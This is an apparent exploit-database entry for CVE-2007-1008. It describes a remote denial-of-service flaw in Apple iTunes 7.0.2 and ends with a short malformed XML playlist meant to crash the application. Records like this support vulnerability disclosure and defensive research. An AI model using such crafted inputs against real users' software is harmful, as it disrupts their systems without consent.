EXPLOITS

Apple iTunes 7.0.2 - XML Parsing Remote Denial of Service

Author: poplix
type: dos
platform: osx
port: 
date_added: 2007-02-19  
date_updated: 2013-11-16  
verified: 1  
codes: CVE-2007-1008;OSVDB-33742  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 29616.xml  

source: https://www.securityfocus.com/bid/22615/info

Apple iTunes is prone to a remote denial-of-service vulnerability because the application fails to handle malformed XML playlist files.

An attacker can exploit this issue to crash the application, triggering a denial-of-service condition.

Apple iTunes version 7.0.2 for Intel and PowerPC are vulnerable to this issue; other versions may also be affected.

<?die with your boots on?>
<kb:station_record>
<kb:station_url_record>
</kb:station_url_record>